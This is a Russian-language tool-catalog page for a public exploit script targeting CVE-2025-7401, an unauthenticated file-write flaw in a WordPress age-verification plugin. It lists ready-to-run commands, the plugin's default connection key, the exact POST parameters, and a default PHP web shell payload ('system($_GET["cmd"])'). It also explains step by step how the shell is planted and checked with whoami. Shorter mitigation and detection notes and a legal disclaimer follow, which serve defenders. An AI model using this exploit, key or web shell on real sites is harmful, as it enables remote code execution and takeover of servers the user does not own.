Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-7401 — Premium Age Verification / Restriction for WordPress <= 3.0.2 - Неаутентифицированное произвольное чтение и запись файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-7401
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2025-7401

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - Неаутентифицированное произвольное чтение и запись файлов

Репозиторий
2110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - Неаутентифицированное произвольное чтение и запись файлов

🧾 Premium Age Verification / Restriction for WordPress <= 3.0.2 — Неаутентифицированное произвольное чтение и запись файлов

📝 Описание

Плагин «Premium Age Verification / Restriction for WordPress» содержит недостаточно защищённую конечную точку удалённой поддержки в remote_tunnel.php. В затронутых версиях до 3.0.2 включительно эта конечная точка может быть использована для неаутентифицированного произвольного чтения и записи файлов. Успешная эксплуатация может раскрыть конфиденциальную информацию или позволить удалённое выполнение кода.

  • CVE: CVE-2025-7401
  • CVSS: 9.8 (критическая)

⚙️ Обзор скрипта

  • Имя скрипта: CVE-2025-7401.py
  • Назначение: инструмент тестирования для авторизованных специалистов по безопасности, позволяющий проверить поведение записи файлов в уязвимой конечной точке плагина. Скрипт нормализует цель, кодирует предоставленный пользователем PHP-фрагмент, отправляет POST-запрос к уязвимой конечной точке для попытки записи файла и опционально проверяет доступный через веб путь к файлу.

▶️ Быстрые примеры использования

root@kitploit:~
# Базовый режим (используется ключ подключения по умолчанию и стандартная PHP-оболочка)
python CVE-2025-7401.py -u example.com

# Использование HTTPS и пользовательского ключа подключения, без проверки
python CVE-2025-7401.py -u https://target.example -key YOUR_KEY --no-verify

# Пользовательский PHP-пейлоад (только авторизованное тестирование)
python CVE-2025-7401.py -u target.com -shell '<?= system($_GET["cmd"]); ?>'

🧭 Параметры командной строки


📋 Подробное поведение скрипта (пошагово)


📌 Ожидаемые результаты и их значение


🛡️ Смягчение последствий и рекомендации

  • Немедленно обновите плагин до пропатченной версии, предоставленной вендором.
  • Ограничьте доступ к функциям удалённой поддержки с помощью аутентификации и надлежащих проверок авторизации.
  • Очищайте и проверяйте все пользовательские пути к файлам и содержимое файлов на стороне сервера.
  • Примените строгие права файловой системы, запрещающие веб-пользователю создавать исполняемые файлы в корне веб-сайта.
  • Разверните правила WAF для обнаружения и блокировки подозрительных запросов к remote_tunnel.php.

🔎 Обнаружение и криминалистика

  • Проверяйте журналы веб-сервера на POST-запросы к /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php с параметрами: action=save_file, file, file_content.
  • Ищите неожиданные файлы в каталоге плагина, такие как remote_init.php.
  • Ищите пейлоады в кодировке Base64 в телах POST-запросов.
  • Сопоставляйте временные метки изменений файлов с подозрительными запросами.

🤝 Ответственное раскрытие

Если вы обнаружили эту уязвимость в сторонней инфраструктуре:

  • НЕ эксплуатируйте и не изменяйте производственные системы.
  • Свяжитесь с владельцем сайта или вендором плагина приватно и безопасно.
  • Предоставьте вендору воспроизводимые шаги и дайте разумное время на устранение до любого публичного раскрытия.

⚖️ Правовое уведомление и безопасность

Несанкционированное использование инструментов тестирования уязвимостей незаконно во многих юрисдикциях. Этот репозиторий и скрипт предназначены исключительно для оборонительных исследований, авторизованного тестирования и скоординированного раскрытия уязвимостей. Всегда получайте явное письменное разрешение перед тестированием систем, которые вам не принадлежат.


❗ Дисклеймер

Автор и участники не несут ответственности за неправильное использование информации или инструментов. Используйте этот материал только в рамках закона и этических норм.


Автор: Nxploited ( Khaled Alenazi )

Скачать инструмент
ФлагТипЗначение по умолчаниюОписание
-u, --urlstringrequiredЦелевой домен или частичный URL. Скрипт добавит конечную точку плагина при необходимости. Примеры: example.com, https://example.com, example.com/wp-content/plugins/age-restriction/.
-key, --keystring330489965d8266a739442ef890f57805Ключ подключения, используемый конечной точкой удалённой поддержки. При необходимости переопределите для лабораторных целей.
-shell, --shellstring<?= system($_GET["cmd"]); ?>PHP-фрагмент для внедрения в качестве содержимого файла. Изменяйте только для авторизованного тестирования.
--no-verifyflagfalseПри наличии скрипт не будет выполнять опциональную GET-проверку записанного файла.
ШагДействиеПодробности
1Нормализация вводаПринимает пользовательский ввод (домен или частичный путь). Гарантирует наличие схемы (добавляет http:// при отсутствии), удаляет дублирующиеся слэши и добавляет /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php, если конечная точка отсутствует.
2Формирование заголовковФормирует реалистичные HTTP-заголовки запроса (ротация user-agent, Accept, Referer, Content-Type).
3Кодирование пейлоадаКодирует предоставленный PHP-фрагмент в Base64 и помещает его в file_content.
4POST-запрос эксплойтаОтправляет connection_key, action=save_file, file (серверный путь) и file_content на нормализованную конечную точку remote_tunnel.php через application/x-www-form-urlencoded.
5Разбор ответаПытается извлечь JSON из тела ответа. Если JSON присутствует, выводит status и file_path; в противном случае выводит очищенный сырой ответ.
6Проверка (опционально)Выполняет GET-запрос к /wp-content/plugins/age-restriction/modules/remote_support/remote_init.php?cmd=whoami, чтобы проверить, доступен ли внедрённый файл и возвращает ли он содержимое. Опционально — отключается с помощью --no-verify.
7Формирование отчётаВыводит структурированный, читаемый отчёт, включающий использованную конечную точку, HTTP-статус, разобранный JSON (при наличии), ожидаемый URL оболочки и усечённый вывод проверки (при успехе).
Поле выводаЗначениеПример
Целевая конечная точкаФинальный нормализованный URL, к которому выполняется обращение (полный путь к remote_tunnel.php).http://example.com/wp-content/.../remote_tunnel.php
Код HTTP-статусаКод ответа HTTP от POST-запроса. 200 часто означает, что запрос обработан.200
Статус JSON в ответеЕсли конечная точка возвращает JSON, поле status сообщает об успехе или неудаче.valid
file_path в JSON-ответеСерверный путь, возвращённый конечной точкой, показывающий, куда был записан файл (информационно)./var/www/html/wp-content/.../remote_init.php
Сырой ответТело ответа, не содержащее JSON (очищенное), например, PHP-уведомления или сообщения.Notice: ...
URL оболочки (ожидаемый)Публичный URL, по которому внедрённый файл будет доступен. Используйте только для проверки в авторизованных тестах.http://example.com/wp-content/.../remote_init.php?cmd=whoami
HTTP-статус проверкиHTTP-статус опциональной GET-проверки.200
Тело проверки (усечённое)Первые N символов тела ответа проверки (полезно для просмотра вывода команды).www-data